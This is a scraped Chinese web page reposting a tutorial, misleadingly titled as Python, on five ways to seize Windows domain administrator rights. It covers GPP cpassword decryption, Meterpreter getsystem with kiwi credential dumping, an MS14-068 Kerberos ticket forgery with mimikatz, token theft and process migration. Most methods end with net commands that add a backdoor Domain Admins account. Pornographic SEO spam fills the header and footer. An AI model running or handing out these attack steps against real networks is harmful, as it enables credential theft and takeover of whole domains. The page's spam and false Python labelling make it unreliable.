国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

腳本之家,腳本語言編程技術(shù)及教程分享平臺!
分類導(dǎo)航

Python|VBS|Ruby|Lua|perl|VBA|Golang|PowerShell|Erlang|autoit|Dos|bat|

服務(wù)器之家 - 腳本之家 - Python - Python安全獲取域管理員權(quán)限幾種方式操作示例

Python安全獲取域管理員權(quán)限幾種方式操作示例

2022-01-25 00:03Bypass-- Python

在不考慮直接攻擊域控的情況下,如何快速獲取域管理員權(quán)限呢?本文分享幾種常見的獲取域管理員權(quán)限的方式,有需要的朋友可以借鑒參考下

在大多數(shù)情況下,攻擊者可以通過定位域管理員所登錄的服務(wù)器,利用漏洞獲取服務(wù)器system權(quán)限,找到域管理的賬號、進(jìn)程或是身份驗(yàn)證令牌,從而獲取域管理員權(quán)限

 

第1種方式:利用GPP漏洞獲取域管理權(quán)限

SYSVOL是域內(nèi)的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當(dāng)域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導(dǎo)致安全問題。

(1)訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

Python安全獲取域管理員權(quán)限幾種方式操作示例

(2)使用kali自帶的gpp-decrypt進(jìn)行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權(quán)限。

Python安全獲取域管理員權(quán)限幾種方式操作示例

 

第2種方式:獲取服務(wù)器明文登錄密碼

使用kiwi模塊需要system權(quán)限,所以我們在使用該模塊之前需要將當(dāng)前MSF中的shell提升為system。提到system有兩個方法,一是當(dāng)前的權(quán)限是administrator用戶,二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊

load kiwi

列舉系統(tǒng)中的明文密碼

creds_all

Python安全獲取域管理員權(quán)限幾種方式操作示例

 

第3種方式:使用MS14-068漏洞進(jìn)行提權(quán)

MS14068是一個能夠使普通用戶提權(quán)到域控權(quán)限的權(quán)限提升漏洞。攻擊者可以通過構(gòu)造特定的請求包來達(dá)到提升權(quán)限的目的。

攻擊流程:

第一步:利用MS14-068偽造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

Python安全獲取域管理員權(quán)限幾種方式操作示例

第二步:利用mimikatz將工具得到的TGT票據(jù)寫入內(nèi)存,創(chuàng)建緩存證書

mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

Python安全獲取域管理員權(quán)限幾種方式操作示例

第三步:獲取域管理員權(quán)限。創(chuàng)建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機(jī)進(jìn)行操作。

PsExec.exe \\dc cmd.exe 
// 添加test用戶
net user test abc123! /add /domain
// 把 test 用戶添加進(jìn)域管理員組
net group "domain admins"  test /add /domain
// 查看域管理員
net group "domain admins" /domain

 

第4種方式:竊取域管理員令牌

當(dāng)有域控賬戶登陸至服務(wù)器時可使用令牌模擬進(jìn)行滲透取得域控權(quán)限。

1、入侵域管理員所在的服務(wù)器,竊取域管理員的令牌,從而控制整個域。

Python安全獲取域管理員權(quán)限幾種方式操作示例

2、直接在meterpreter shell上執(zhí)行添加域管理員

add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

 

第5種方式:進(jìn)程遷移

入侵了域管理員所登錄的服務(wù)器,將進(jìn)程遷移到域管理員所運(yùn)行的進(jìn)程,就可以獲得域管理員權(quán)限。

1、獲取域管理員列表

net group "Domain Admins" /domain

Python安全獲取域管理員權(quán)限幾種方式操作示例

2、利用ps找到域管理員(TEST\bypass)所運(yùn)行的進(jìn)程,然后將shell進(jìn)程遷移到域管理員所運(yùn)行的進(jìn)程中,成功后就獲得了域管理員權(quán)限。如下圖所示:

Python安全獲取域管理員權(quán)限幾種方式操作示例

3、輸入shell命令獲取OS shell,在本機(jī)上使用Windows命令添加新的域管理員:

// 添加test用戶
net user test admin@123 /add /domain
// 把 test 用戶添加進(jìn)域管理員組
net group "domain admins"  test /add /domain

4、成功添加了域管理員賬號test。

Python安全獲取域管理員權(quán)限幾種方式操作示例

以上就是Python安全獲取域管理員權(quán)限幾種方式操作示例的詳細(xì)內(nèi)容,更多關(guān)于Python獲取域管理員權(quán)限方式的資料請關(guān)注服務(wù)器之家其它相關(guān)文章!

原文鏈接:https://blog.csdn.net/qq_23936389/article/details/120714817

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 国产精品区二区三区日本 | 黄色a站 | 伊人网电影| 成人黄色片网站 | 成人精品视频 | 亚洲 自拍 另类 欧美 丝袜 | 啪啪网站免费 | 欧美精品一区二区三区在线播放 | 久久九九国产精品 | 中文字幕一区二区三区精彩视频 | 国产美女精品视频 | 懂色一区二区三区av片 | 国产成人精品一区二区三区网站观看 | 黑人av | 波多野结衣一二三四区 | 日韩欧美三级 | 亚洲欧美日韩成人 | 北条麻妃99精品青青久久 | 欧美精品久久久久久久久老牛影院 | 在线一区观看 | 午夜视频免费 | 亚洲成av在线 | 在线手机电影 | 中文字幕av一区二区三区 | 免费观看国产视频在线 | 一级免费毛片 | av动漫一区二区 | 亚洲欧美国产精品专区久久 | 婷婷狠狠 | 精品黄色在线 | 中国女人真人一级毛片 | 亚洲精品国偷拍自产在线观看 | 毛片网页 | 国精产品99永久一区一区 | 亚洲精品久久久久中文字幕欢迎你 | 黄色在线网站 | 男人午夜视频在线观看 | 亚洲国产精品电影在线观看 | 欧美成人免费电影 | 成人免费看片 | 自拍视频网站 |